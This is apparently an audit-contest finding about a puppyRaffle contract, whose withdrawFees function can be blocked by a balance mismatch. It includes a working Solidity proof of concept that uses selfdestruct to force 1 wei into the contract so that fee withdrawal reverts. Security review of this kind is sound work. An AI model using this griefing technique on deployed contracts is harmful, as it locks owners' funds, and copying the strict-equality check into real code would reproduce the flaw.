Submission Details
Severity:
WithdrawFees can be blocked
Summary
WithdrawFees can be blocked if the balance of the raffle contract is different to the totalFees variable
Vulnerability Details
If the total fees are different to the balance of the contract then the owner cannot withdraw fees. There are multiple ways this could potentialy happen such as rounding errors, but the easiest way for an attacker to achieve this is to forcably send Eth to the contract.
POC
// Attacker contract
contract Attacker {
constructor(address target) payable {
// forcibly send 1 wei to the target contract
selfdestruct(payable(target));
}
}
function testBlockWithdrawFees() public playersEntered {
vm.warp(block.timestamp + duration + 1);
vm.roll(block.number + 1);
puppyRaffle.selectWinner();
// create a contract that will forcibly send 1 wei to the target contract
new Attacker{value: 1}(address(puppyRaffle));
// reverts
puppyRaffle.withdrawFees();
}
Impact
The owner of the protocol will not be able to claim any fees
Tools Used
Manual review
Recommendations
Fees should be sent in the selectWinner() function instead
Updates
Lead Judging Commences
Hamiltonite over 1 year ago
Submission Judgement Published Assigned finding tags:
greifers-send-money-to-contract-to-block-withdrawfees
Rewards breakdown
nSLOC
143This contest has a flat reward structure with the following payouts:
100 EXP
20 EXP
2 EXP
Live
The contest is live. Earn rewards by submitting a finding.
Appeals
This is your time to appeal against judgements on your submissions.
Appeals Review
Appeals are being carefully reviewed by our judges.